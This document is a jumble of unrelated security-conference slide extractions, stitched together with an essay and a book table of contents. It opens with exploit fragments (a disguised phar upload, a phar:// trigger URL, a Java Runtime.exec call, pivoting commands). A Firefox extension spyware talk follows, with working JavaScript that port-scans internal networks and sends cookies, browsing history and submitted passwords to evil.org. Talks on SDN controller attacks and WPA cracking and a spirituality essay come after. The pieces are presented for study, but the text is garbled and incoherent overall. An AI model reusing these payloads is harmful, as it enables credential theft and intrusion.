C5te8X-KIwxMG9kCtZU1c_cOgLVerJYpk
Connection: close
Content-Type: multipart/form-data; boundary=--------1625044263
Content-Length: 566
----------1625044263
Content-Disposition: form-data; name="upfile";
filename="652e043ee9f20635d0b3f2ea1085f0819.png"
Content-Type: application/zip
1
----------1625044263--
<http://172.35.13.101:31337/index.php?
s=/api/Base/checkFileExists&filepath=phar:///var/www/html/public/uploads/api/202105/60b
37c793f521.png>
var JavaTest= Java.type("java.lang"+".Runtime");
var b =JavaTest.getRuntime();
b.exec("ls /");
throw b;
return "a";
}
coturn
turner
https://github.com/staaldraad/turner.git (golang)
proxychains ip http://192.168.0.23
minus(1);
function ddadf()
{
sudo ./turner -server 10.10.10.102:8000 -socks5
Firefox Extension Spyware
ant
Hacks in Taiwan Conference 2008
Outline
1. Insecure Firefox extensions
2. Firefox extension spyware
3. Is Firefox 3 ready?
Insecure Firefox Extensions
● FormSpy
● A well-known Firefox extension spyware
● Discovered in July 2006
● Disguised as the legitimate NumberedLinks 0.9
● Steals credit card numbers, passwords, online banking PINs,
and ICQ, FTP, IMAP, and POP3 passwords.
● FFsniFF
● Hides itself from the extensions list
● Automatically sends form contents out via SMTP
● Dec 2006: Firefox 2 support; Jun 2008: Firefox 3 support
● Sage
● RSS Reader
● 2006/09, Cross-Zone Scripting
● Firebug
● Javascript debugger
● 2007/04, Cross-Zone Scripting
XPCOM
Cross-platform security issues
(Windows, Linux, BSD, Mac OS)
Firefox extension spyware
1. Phishing pages
2. Internal network scanning
3. Browsing history tracking
4. Cookie theft
5. Automated CSRF attacks
6. FormSpy
7. ReadFile
8. Run Remote App/File
1. Phishing Pages
Yahoo! Kimo login page
Yahoo! Kimo phishing page
Demo
<HTML>
....
<a href=foo>foo</a>
<a href=yahoo_login>Login</a>
<a href=bar>bar</a>
....
</HTML>
2. Internal Network Scanning
● Bypass the firewall
● Probe private IP addresses
● Obtain the internal IP
● Learn intranet server IPs and server information
● ... etc.
SSH
NetBIOS
FTP
HTTP
1
2
SSH
NetBIOS
FTP
HTTP
1
3
2
Demo #1
IP range
Scanning
Send
status = "";
function callback(target, port, status) {
    new Image().src =
        "http://evil.org/evil/scanLAN.php?target=" + target + "&port=" + port + "&status=" + status;
};

var AttackAPI = {
    version: '0.1',
    author: 'Petko Petkov (architect)',
    homepage: 'http://www.gnucitizen.org',
    modifyBy: 'Yi-Feng Tzeng'
};
New Image( )
Host down
Port closed
Host : Port
Host up
Port open
error
timeout
AttackAPI.PortScanner = {};
AttackAPI.PortScanner.scanPort = function (callback, target, port, timeout) {
    var timeout = (timeout == null) ? 2000 : timeout;

    var img = new Image();

    img.onerror = function () {
        if (!img) return;
        img = undefined;
        callback(target, port, 'open');
    };

    img.onload = img.onerror;
    img.src = 'http://' + target + ':' + port;

    setTimeout(function () {
        if (!img) return;
        img = undefined;
        callback(target, port, 'closed');
    }, timeout);
};
AttackAPI.PortScanner.scanTarget = function (callback, target, ports, timeout)
{
    for (p = 1; p < target.length; p++)
    {
        for (index = 0; index < ports.length; index++)
            AttackAPI.PortScanner.scanPort(callback, target[p], ports[index], timeout);
    }
};

AttackAPI.PortScanner.scanTarget(callback, arrAddr, port.split(','), 2000);
Limitations
1. Java (JRE) must be installed
2. No cached scan records
3. Cannot handle the timeout problem
network.http.max-connections
network.http.keep-alive.timeout
max-connections
new Image
If full ; IDLE
timout
DROP
Firefox 2
network.http.max-connections: 24
network.http.keep-alive.timeout: 300
Firefox 3
network.http.max-connections: 30
network.http.keep-alive.timeout: 300
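The connection limits above live in Firefox preferences; as a sketch, they can be overridden from user.js (the values shown are simply the Firefox 3 defaults just listed):

```js
// user.js — hypothetical overrides of the prefs discussed above
user_pref("network.http.max-connections", 30);
user_pref("network.http.keep-alive.timeout", 300);
```

Raising max-connections lets more probe Images run in parallel before new requests start queuing.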
Scanning too many targets makes the browser sluggish
Blind IP guess
Scanning
Send
Save
guessLAN = ["192.168.0.", "192.168.1.", "10.0.0.", "10.0.1.", "169.254.132."];
pref('extensions.resize.guess', true);
pref('extensions.resize.LAN', '192.168.0.');
pref('extensions.resize.scanLAN', '192.168.0.0');
pref('extensions.resize.lastRun', '');
Demo #2
Signatures
Apache /icons/apache_pb.gif
Apache2 /icons/apache_pb2.gif (apache_pb22.gif)
EPSON Printer EpsonNet_logo.gif
HP Printer /hp/device/images/hp_invent_logo.gif
IIS 4.0/5.0 iis4_5.gif
IIS 5.0/5.1/6.0 iis51_6.gif
SunOne WebServer sun.gif
Cisco HTTP cisco.gif
LinKsys linksys.gif
TightVNC vnc.gif
WebLogic Server 8.x bea.gif
thttpd thttpd.gif
New Image( )
Host down
Port closed
Host : Port
Host up
Port open
error
timeout
Signatures
3. Browsing History Tracking
● Wherever you go, you leave a trace
HTTP
HTTP (link)
1
2
Demo
// Get Time
var currentTime = new Date();
var year = currentTime.getFullYear();
var month = currentTime.getMonth() + 1;
var day = currentTime.getDate();
var hour = currentTime.getHours();
var min = currentTime.getMinutes();
var sec = currentTime.getSeconds();
var time = year + "-" + month + "-" + day + ":" + hour + ":" + min + ":" + sec;

new Image().src =
    "http://evil.org/evil/historyspy.php?time=" + time +
    "&link=" + document.location.href +
    "&port=" + ((!document.location.port) ? 80 : document.location.port);
4. Cookie Theft
● Face Off: you are me, and I am you
HTTP (cookie)
1
2 HTTP (cookie)
Bob
ant
I'm
Bob
Hello
Bob
3
4
Demo
// Get Time
var currentTime = new Date();
var year = currentTime.getFullYear();
var month = currentTime.getMonth() + 1;
var day = currentTime.getDate();
var hour = currentTime.getHours();
var min = currentTime.getMinutes();
var sec = currentTime.getSeconds();
var time = year + "-" + month + "-" + day + ":" + hour + ":" + min + ":" + sec;

new Image().src =
    "http://evil.org/evil/steal.php?time=" + time +
    "&link=" + document.location.href +
    "&port=" + ((!document.location.port) ? 80 : document.location.port) +
    "&cookie=" + document.cookie;
5. Automated CSRF Attacks
● Automated money transfers?
HTTP
1
2 HTTP:GET (cookie)
Demo #1
new Image().src=
"http://victim.org/withdraw.php?for=000100&amount=100";
POST
Referer
Double Cookie
Random Tokens
HTTP (cookie)
HTTP
1
2
3
CSRF
Demo #2
new Image().src=
"http://evil.org/evil/csrf.php?cookie="+document.cookie+"&time="+time;
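Among the defenses listed above, the double-submit cookie works by storing the same random token in a cookie and in the form, then comparing the two copies server-side. A minimal sketch (function and field names are mine, not from the slides):

```python
import hmac
import secrets

def issue_token(session):
    # Server stores a random token in a cookie (here modeled as a dict entry)
    # and returns the same token to embed in the form as a hidden field.
    token = secrets.token_hex(16)
    session["csrf_cookie"] = token
    return token

def verify(session, submitted_token):
    # A forged cross-site request can send the form field or the cookie,
    # but not matching copies of both.
    cookie_token = session.get("csrf_cookie", "")
    # Constant-time comparison to avoid timing side channels.
    return hmac.compare_digest(cookie_token, submitted_token)
```

The spyware variant in Demo #2 sidesteps this entirely by shipping `document.cookie` to the attacker, who can then forge both copies.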
6. FormSpy
● Whatever you submit, please send me a copy too
Yahoo! Kimo login page
HTTP (submit)
HTTP
1
4
2 HTTP
3 HTTP (submit)
Demo
<HTML>
....
<FORM>
....
<input type=text ....>
<input type=password ....>
....
</FORM>
....
</HTML>
if (gotPasswd == 1)
{
    new Image().src =
        "http://evil.org/evil/formspy.php?time=" + time +
        "&link=" + document.location.href +
        "&port=" + ((!document.location.port) ? 80 : document.location.port) +
        "&data=" + data;
}
Browsing history tracking
FormSpy
Automated CSRF
Cookie theft
7. ReadFile
● Mind showing me your files?
HTTP
1
2
Read
Demo
8. Run Remote App/File
● Drive-by download
HTTP
2
1
Run
Demo
Internal network scanning
A
Extension update
B
Malware download
C
Internal network intrusion
D
Distribution?
Firefox "lazy packs" (all-in-one bundles)
( spyware included )
( spyware hidden )
Disguised, localized, "compatible", or "feature-enhanced" builds
( spread via forums )
( hides itself after 5 days )
Disguise Examples
resizeable textarea
(phishing)
Dashboard
(zombie)
Gmail Example
HTTP (cookie)
1
2 HTTP (cookie)
3 HTTP (cookie)
Is Firefox 3 Ready?
● Firefox 3 restricts some extension capabilities
● Forbids document.write
● Calling external functions, e.g. new java.net.Socket()
● etc.
● But how much does that protect against the attacks above?
● NoScript ?
● HTTP-only cookies ? (Firefox3)
● Firefox 4 ?
Greasemonkey Script ?
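The HTTP-only mitigation mentioned above relies on the server flagging its session cookies so that page script cannot read them via document.cookie; a sketch of the response header (cookie value hypothetical):

```http
Set-Cookie: PHPSESSID=abc123; HttpOnly; Secure
```

This blunts the document.cookie-based stealers shown earlier, though a full extension with XPCOM access can still reach the browser's cookie store directly.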
"Know the enemy and know yourself, and in a hundred battles you will
never be in peril." — Sun Tzu, "Attack by Stratagem"
The Second Edition:
Remembering Who We Are
by Richard Thieme
Most of us live a large part of our lives skating on the ice of trivial essentials, the
necessary tasks that fill our waking days. We pause from time to time and look at the
etched images in the ice and think, this is the pattern of our lives, these images reveal our
character and choices.
But more, much more, is going on.
Occasionally, the ice thins, heeding a midwinter springtime we don’t know how to
define, a season hidden inside us, a season determined by a different sun. That sun knows
what we need and when we need it. Our readiness is all.
The ice cracks and we fall into darkness that explodes paradoxically with light, we are
saturated, immersed in the root sources of meaning. We know in those moments what
matters, what is real.
The contents of ordinary days quickly return and fill our waking state, the meaning of
those moments almost but not quite forgotten. But we never really forget. And next time
it happens, we recognize the experience for what it is. We link those moments into a
different, more fundamental pattern, we say to ourselves, yes. I know this place. I have
been here before.
We remember who we really are.
A few years ago, a long friendship with another couple kind of played itself out. It drifted
for a year or two toward an end with a whimper, not a bang, as relationships often do. We
had taken different paths, with divergent interests, values, and choices, and moved apart.
After a while, there wasn’t much point in getting together anymore.
That was acceptable. We knew that people grow and change. It happens.
Our lives, filled with those trivial essentials, moved on.
Then, a few weeks ago, seemingly out of nowhere, I felt intense waves of energy that
surged or swept up in me or into me – the metaphors don’t really enlighten, they merely
point toward things we don’t know how to explain – strong palpable waves associated
with the name of the woman. As they came, I knew it had something to do with her but
not what or why. I would be working out at the gym or driving or watching snow fall
onto the trees through my office window, doing something else as it were with the other
parts of my mind, when from around back at the edges, it felt like, her name and those
waves of energy seized my attention.
That used to happen with regularity when I was in the professional ministry because, I
think, I was linked to so many people with an intention to be open. Oh I know, I know,
when we call someone and ask how they are and they say they were thinking of us too or
something important is going on, it’s easy to say it’s nothing but coincidence.
But other times, calling it a coincidence is a bit of a stretch.
I think of the time I had been visiting the mother of a member of the parish who was in a
nursing home, seriously ill. I would stop by in the morning and then go on with the rest of
the day. One day, however, although I had been there for my morning visit, as I returned
to the office from lunch, one of those waves came. I was in the left hand lane of a wide
Salt Lake City street, ready to turn left onto Highland Drive and return to the church,
when it flashed through me and I thought, no, I had better get back there now. I crossed
several lanes - Brigham Young wanted Salt Lake City streets to be wide enough to u-turn
a team of oxen, remember – and turned right instead and returned to the nursing home.
As I pulled up to the door, the parishioner was on the curb.
“How did they find you so fast?” she said.
I shook my head. “What do you mean?”
“Mother just died, I just ran to the office and told them to call you.”
Some said I had picked up subliminal clues that the mother was about to die and
calibrated my anomalous return to what I knew unconsciously. That “rational”
explanation begs more questions than the obvious one, that I got the call and responded.
Spirituality, I was discovering in those years, meant not that some had “special gifts” but
that it was human to be this way, that spiritual discipline meant learning to listen and not
shut it out because one might be embarrassed to act on an impulse without knowing why.
The imperative was not knowing but knowing that you knew, then acting, even if you
didn’t know what you knew or how.
I learned to honor the experience by at least making a telephone call and saying, hi,
what's going on? That’s what I might have done twenty years earlier as a matter of
professional habit. But this time, I did not want to reestablish a connection or reawaken
the relationship. It was better, I told myself, to let it go, despite successive waves of
feeling that always came with the name of my long-ago friend.
So I didn’t respond. I rode them out, let them subside, and resisted the call.
Last week my wife said, “Look at this.” She handed me an obituary for the mother of my
friend. She had been in the last stages of dying when the waves began. We went to the
funeral, saw our friends again, and expressed condolences. That might have been the end
of it, but the following Sunday, remembering that my friend and her husband had had
dinner every Sunday night with her mother and that this was the first Sunday without her,
I telephoned and suggested that we have dinner. As it happened, no one else had thought
of that connection and they would have been alone. So the four of us went to a favorite
restaurant and talked for hours.
We were friends again, we realized, or still. But that’s not the point. This is the point:
I told her what I had felt and when and how and she said it began when her mother sank
toward certain death. The waves of deep feeling were indeed a distress call, non-localized, consciousness to consciousness, however that happens. It's like entanglement,
we say, spooky action at a distance, Einstein called it, but that doesn’t explain anything.
I said as we both shed a few tears of shared grief that I had betrayed my calling, not as a
former clergyman but as a human being, a spiritual being, by resisting the call and
refusing to honor the fact of our connection.
I have often said that professional ministry is a training program for those like myself
who seem to need it to become more fully human. We enter the profession not because
we need the training less but because we need it more. And it works, the ministry as a
training program works, because you can’t do that work effectively without learning each
time a person brings you the truth of their lives and teaches you how resilient, elastic,
even heroic humans are, not as an add-on but intrinsically. It is axiomatic to our humanity
to transcend whatever life brings.
Once you know that, not once you read about it, think it, or recite it in a ritual, but
KNOW that we are all connected, not metaphorically but in fact, that we really are all
part of one another and of something bigger than we are, call it the universe, call it a
body, call it whatever you like, once we know that we are cells in a body that may well
grow to fill the galaxies and all of spacetime with its expansive meta-self, then it is
axiomatic to know too that we belong to one another, that the well being of the other is as
critical to me as my own, and to care for the other as for myself is an imperative – not as
a duty, but as a concomitant aspect of knowing that to do this is what it means to be
human.
As notions go, this is not new. But it makes a difference to "get" it and not just think it
with the left-side part of the brain that thinks it knows everything and that what I am
saying here is foolishness and rant.
Mechanical engineering is not the end of life, after all.
I realized that I had chosen, contrary to what I knew but forgot, to push away what I felt
and not act, and that was a betrayal, a betrayal of the real, a betrayal of the non-trivial
sources of meaning and love.
I told her at that dinner that I had failed to honor that ineluctable fact of correlated
relationship. It is not what is related but relationship itself that structures the universe.
The angle of inclination is an imperative I had disregarded.
She cried and we hugged and she said, in that moment, it was honored.
Our readiness is all.
We can not unlearn what we have learned but we can neglect to remember it. We are
cells in a single body, a single trans-person as it were, human and non-human alike,
knitted into a being that extends to the edges of spacetime, infolded into a single
mysterious vital beating heart.
Our sins, then, are often sins of forgetting, omission or neglect. When we remember who
we are, when the quotidian vanishes in a flash, we act in accordance with fact. And when
we do, the stars and planets and galaxies, the pattern or the form of the universe that
angles us into complementary beings of wonder, with countenance and form and purpose
beyond our grasp ... we sing in a single thousand-part harmony, a chorus of myriad
voices sounding one might guess like a shout.
The Second Edition is a periodic reflection by author and speaker
Richard Thieme. Subscribe (or unsubscribe) by clicking below or writing to
[email protected] and stating subscribe (or unsubscribe).
Richard Thieme (www.thiemeworks.com) speaks and writes about the issues
of our times, with an emphasis on the impact of various technologies on the structures of
our lives, creativity in work and life, and how to reinvent ourselves in response to
challenges – all aspects of “enlightened practical spirituality.” If interested in
having him speak to your organization, email [email protected]. | pdf |
Customize Evil Protocol to Pwn an SDN Controller
HACKING THE BRAIN
Feng Xiao, Ph.D. student at PennState, Cyber Security Lab
Jianwei Huang, Researcher at Wuhan University
Peng Liu, Professor at PennState, Cyber Security Lab
What’s SDN?
[Diagram: network functions in the control plane driving virtual switches in the data plane]
Software-Defined Networking (SDN) is an emerging architecture that
decouples the network control and forwarding functions.
What’s SDN Like Today?
Who is using it?
• More than 15 popular controllers.
• More than 3000 open source SDN projects.
Who is contributing?
• Data Center
• IDC
• Telecom
• …
Overview of SDN Attacks
Attack on Control Plane
• Topology tampering
• Control channel flooding
Attack on Data Plane
• Switch OS Hacking
• TCAM Flooding
[Diagram: controller and apps in the control plane, linked to the data plane via NETCONF, OpenFlow, and OVSDB]
Pwn It Like A Hacker?
Software-Defined Networks
Decoupled Control Plane and Data Plane
[Diagram: apps (Firewall, Load-Balancing) on the controller, a control channel running OpenFlow and OVSDB, and the switch/host infrastructure below]
Pwn It Like A Hacker?
Our Choice: Custom Attack
Custom Attack
Custom Protocol Field (CPF) in
legitimate protocol interactions
•CPF is controlled by data plane
•CPF will be processed by components
in the controller
[Diagram: the CPF flows from the infrastructure into the controller, through services, apps, and libraries]
CPF results in a semantic gap between
control plane and data plane
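To make the semantic gap concrete, the sketch below shows how a CPF could ride inside an otherwise legitimate LLDP topology-discovery frame. This is an illustration only, not the authors' actual tooling: the TLV layout follows IEEE 802.1AB, while the OUI bytes and the XXE payload are made up for the example.

```python
import struct

def lldp_tlv(tlv_type: int, value: bytes) -> bytes:
    # LLDP TLV header: 7-bit type and 9-bit length, followed by the value.
    header = (tlv_type << 9) | (len(value) & 0x1FF)
    return struct.pack("!H", header) + value

def craft_lldp_with_cpf(chassis_mac: bytes, port_id: bytes, cpf_payload: bytes) -> bytes:
    # Mandatory TLVs of a normal LLDP frame, so the controller accepts it...
    frame = lldp_tlv(1, b"\x04" + chassis_mac)    # Chassis ID (subtype 4: MAC address)
    frame += lldp_tlv(2, b"\x07" + port_id)       # Port ID (subtype 7: locally assigned)
    frame += lldp_tlv(3, struct.pack("!H", 120))  # TTL
    # ...plus an attacker-controlled optional TLV (type 127, organizationally
    # specific): the Custom Protocol Field the controller will parse and store.
    frame += lldp_tlv(127, b"\x00\x26\xe1\x00" + cpf_payload)
    frame += lldp_tlv(0, b"")                     # End of LLDPDU
    return frame

# Example CPF: an XXE probe smuggled through a field the controller treats as data.
payload = b"<!DOCTYPE x [<!ENTITY e SYSTEM 'file:///etc/passwd'>]>"
pkt = craft_lldp_with_cpf(b"\xaa\xbb\xcc\xdd\xee\xff", b"port-1", payload)
```

From the data-plane side this is just another discovery frame; the exploit happens later, when a controller component interprets the CPF bytes.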
What Can It Cause?
Execute Arbitrary SDN Commands
Steal Confidential Data
Crash/Disrupt Service
Disable Network Function
...
Threat Model
We do NOT assume that hackers can have network access
to SDN controllers or SDN applications
Control channel is well protected by SSL/TLS
A compromised host[1] or switch[2]
[1] exploitable if the target network is configured with in-band control.
[2] Switches are vulnerable to multiple remote attacks (e.g., Buffer Overflow[CVE-2016-2074]).
Attack Workflow
[Diagram: apps and services (Routing, Link Discovery, …) inside the controller, connected to the infrastructure over OpenFlow, NETCONF, and OVSDB; a crafted protocol message carries the CPF injection upward]
① CPF delivery via legitimate protocol interactions (a crafted protocol message)
② Payload transformation for final exploitation (Payload in Form 1 … Form N)
③ Subvert SDN Controller
Hack Something Real!
• Plaintext Key
• Command Execution
• Path Traversal
• XXE
• XSS
Evaluation
5 popular SDN controllers
• Three open source projects (White-box)
• Two commercial products (Black-box)
54 apps
• Analyze 12 protocols
• Identify 476 dangerous function calls
19 zero-day vulnerabilities
• Construct 24 sophisticated exploit chains
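The 476 dangerous function calls were found by analyzing controller code for exploitable sinks. As a rough illustration (the sink names here are guesses for a Java-based controller, not the authors' actual list), the idea resembles a simple pattern scan:

```python
import re

# Illustrative sink patterns; a real study would use proper static analysis.
DANGEROUS_SINKS = {
    "command-exec": re.compile(r"Runtime\.getRuntime\(\)\.exec|ProcessBuilder"),
    "path-traversal": re.compile(r"new\s+File\s*\("),
    "xxe": re.compile(r"DocumentBuilderFactory|SAXParserFactory"),
}

def scan_source(source: str):
    """Return (line number, sink label, stripped line) for every match."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for label, pattern in DANGEROUS_SINKS.items():
            if pattern.search(line):
                hits.append((lineno, label, line.strip()))
    return hits

sample = (
    "ProcessBuilder pb = new ProcessBuilder(cmd);\n"
    "File f = new File(userSuppliedPath);\n"
    "DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();\n"
)
hits = scan_source(sample)
```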
Impact Analysis
Get System Shell (1 of them)
Execute Arbitrary SDN Commands (5 of them)
Steal Confidential Data (7 of them)
Crash/Disrupt Service (11 of them)
0day Profile
Demo
ONOS Remote Command Execution
Conclusions
The first attack that can remotely compromise SDN software stack to
simultaneously cause multiple kinds of attack effects in SDN
controllers.
The data-plane-based attack surface is actually significantly larger
than what has been discovered.
Service-logic-free vulnerabilities in the controller could be exploited in unexpected
ways, overcoming the difficulty imposed by pre-defined protocol interactions.
Thanks!
Email : [email protected]
Homepage: http://fxiao.me
Twitter:
@f3ixiao | pdf |
Brute Force Works Wonders:
WiFi Hacking
Yang Zhe (Longas)
ZerOne Wireless Security Research Group
ZerOne WirelessSec Research
[Word-cloud slides: wireless-technology keywords only — SDR, LTE-FDD, RFID, WiFi, GSM, GSM-R, Bluetooth, ZigBee, NFC, GPS, infrared, satellite communications, jamming, HackRF, OpenBTS, OpenBSC, IoT, connected cars, rail transit, civil aviation, power and energy, healthcare, education, telecom carriers]
• Crack WPA
• Pentest over WiFi
• Fake AP
• Air-Capture
• MITM
• WAP Tunnel
• WAPJack
• WIDS / WIPS/Hotspot
• Deauth/Auth/Disco
• WiFiphisher
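Several of the items above (Deauth, FakeAP, WiFiphisher) revolve around forged 802.11 management frames. As a sketch, a deauthentication frame is just a 24-byte management header plus a 2-byte reason code; the MAC addresses and duration value below are placeholders:

```python
import struct

def deauth_frame(client: bytes, ap: bytes, reason: int = 7, seq: int = 0) -> bytes:
    # 802.11 management frame, type 0, subtype 12 (deauthentication).
    frame_control = 0x00C0
    duration = 0x013A                    # placeholder duration value
    header = struct.pack("<HH6s6s6sH",
                         frame_control, duration,
                         client,         # addr1: receiver (client being kicked)
                         ap,             # addr2: transmitter (spoofed AP)
                         ap,             # addr3: BSSID
                         seq << 4)       # sequence control
    body = struct.pack("<H", reason)     # reason 7: class 3 frame received
                                         # from a nonassociated station
    return header + body

frame = deauth_frame(b"\x11" * 6, b"\x22" * 6)
```

Injecting such frames requires a monitor-mode interface, and 802.11w protected management frames defeat the trick.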
Twelve Monkeys
Air-interface sniffing, FakeAP, intranet penetration, WAPJack, MITM, Deauth
Focus: in 85% of cases it comes down to (oh boy) the WPA password!!!!!
• Dictionary
• WPA PMK Hash
• WPS Online / Offline
• Distributed
• GPU
• Cloud
Crack
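Every one of those approaches ultimately pays the same per-guess cost: WPA/WPA2-PSK derives its pairwise master key with 4,096 rounds of PBKDF2-HMAC-SHA1, which is exactly why GPU, distributed, and cloud cracking pay off. A minimal sketch of the derivation and a dictionary loop (the algorithm is standard; it matches the IEEE 802.11i test vector):

```python
import hashlib

def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    # WPA/WPA2-PSK pairwise master key:
    # PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def dictionary_attack(target_pmk: bytes, ssid: str, wordlist):
    # Each guess costs a full 4096-iteration KDF run, so throughput is the
    # whole game: hence GPU rigs, precomputed PMK tables, and cloud nodes.
    for candidate in wordlist:
        if wpa_pmk(candidate, ssid) == target_pmk:
            return candidate
    return None
```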
#Mainstream
[Workflow diagram: the user uploads a handshake capture to the cloud platform; the platform assigns cracking tasks to compute nodes and returns the results]
{AntiMatter} Wireless Security Assessment Cloud Platform
New platform launch
Initial UI
A few numbers: 300; 40,000,000,000,000 combinations; 3,000 samples; 3 days and nights of public beta
[Word cloud of recovered passwords from the public beta, mixed with filler words — e.g. 6666688888, windgame, susan1003, 12345678, 1qazxsw2, qazwsxedc, wang1104, 19830405, zxm19860412, LYP82NLF, DEPPON%2B*%40147, 1z2x3k4l5q6y, ACC2C7AHSU]
Word roots?!
Computation UI
Num  Invite code
free.wpapass.com
01  7659215ecbb8977597ad913e0f2247af
02  53c555d033c8c6a7eb759d902531b5cc
03  b78783e5171416ecbbc623260e0c5a32
04  eec71f550ce81e6a69294c8f7a7e6784
05  76f429c136532587af08f3a3399a9a3b
Application domains
Internal security inspection, security assessment
Wireless penetration testing, perimeter defense
Home anti-snooping: the guy next door
The girl next door
(karma divider)
The neighborhood fresh meat
Those who came before
Platform feature comparison. Columns: WPA1/2 support; .cap file upload; .hccap file upload; automatic SSID extraction; Chinese SSID support; multiple SSIDs; custom task names; task pause/resume; user-specified dictionaries; tiered dictionaries; browsing of past cracking tasks; external API support.
1  AntiMatter        √ √ √ √ √ √ √ √ √ √  (10 of 12)
2  GPUHASH           √ √ √ √ √            (5 of 12)
3  Cloud Cracker     √ √ √ √ √            (5 of 12)
4  HashCrack         √ √ √ √ √            (5 of 12)
5  HashBreak         √ √ √ √              (4 of 12)
6  Online HashCrack  √ √ √ √              (4 of 12)
7  darkircop         √ √ √                (3 of 12)
Amazing Race
Invite-only
Publish an API
e.g.: tracking and publishing domestic WiFi security reports
Results publication
New modules
Integration with the security industry
Upgrades, e.g.: Kali NetHunter support, open-source hardware
Contribution model
Alliance model
Interesting stuff…
Yang Zhe (Longas)
ZerOne Wireless Security Research Group
[email protected]
Thanks!!
Introducing nmrcOS
Inertia <[email protected]>
Scope
Hackers
System administrators
Distro builders
Overall goals for the project
Stable, secure, trusted system
Intended users
Intended uses
History of the Project
Initial approach
Analysis of problems
Solution
How nmrcOS changed to solve these problems
Rationale for these choices
Noted Features of nmrcOS
Debian based OS (easy to install, supports most hardware)
Kernel mods
Customized apps
Kernel
Linux 2.2.25
Openwall kernel patch (overflow protection, etc)
HAP Linux kernel patch (better chroot, extra logging, etc)
Trusted path enforced in kernel
Random IP IDs
Modified Applications
Customized Pine 4.56
Sendmail 8.12.9
Why we chose it, and why we rebuilt and used “unstable”
Bastille Linux auto-loaded and run by default
Other Features
Installs and boots up in a locked-down state
Host and network based intrusion detection included
Includes many security, encryption and privacy tools
Demonstration of nmrcOS
Live demo of the installation procedure
Configuration of nmrcOS
How to maintain/upgrade an nmrcOS system
Developing for nmrcOS
Creating a non-kernel package
Creating a kernel package
Distributing your package
Creating your own distro based on nmrcOS
Future of nmrcOS
Plans for future revisions of the system
Questions and Followup
http://nmrcos.nmrc.org/
Inertia <[email protected]> | pdf |
Windows Kernel Programming, Second Edition
Pavel Yosifovich
This book is for sale at http://leanpub.com/windowskernelprogrammingsecondedition
This version was published on 2022-01-22
This is a Leanpub book. Leanpub empowers authors and publishers with the Lean Publishing process.
Lean Publishing is the act of publishing an in-progress ebook using lightweight tools and many iterations
to get reader feedback, pivot until you have the right book and build traction once you do.
© 2020 - 2022 Pavel Yosifovich
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
1
Who Should Read This Book . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
1
What You Should Know to Use This Book
. . . . . . . . . . . . . . . . . . . . . . . . . . . . .
1
Book Contents
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
1
Sample Code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
2
Chapter 1: Windows Internals Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
3
Processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
3
Virtual Memory
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
5
Page States . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
7
System Memory
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
7
Threads . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
8
Thread Stacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
9
System Services (a.k.a. System Calls) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
11
General System Architecture
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
13
Handles and Objects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
15
Object Names . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
16
Accessing Existing Objects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
19
Chapter 2: Getting Started with Kernel Development . . . . . . . . . . . . . . . . . . . . . . . .
22
Installing the Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
22
Creating a Driver Project . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
23
The DriverEntry and Unload Routines . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
24
Deploying the Driver . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
26
Simple Tracing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
29
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
32
Chapter 3: Kernel Programming Basics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
33
General Kernel Programming Guidelines . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
33
Unhandled Exceptions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
34
Termination . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
34
Function Return Values
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
35
IRQL
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
35
C++ Usage
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
35
Testing and Debugging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
36
Debug vs. Release Builds . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
37
The Kernel API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
37
Functions and Error Codes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
38
Strings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
39
Dynamic Memory Allocation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
41
Linked Lists . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
43
The Driver Object
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
45
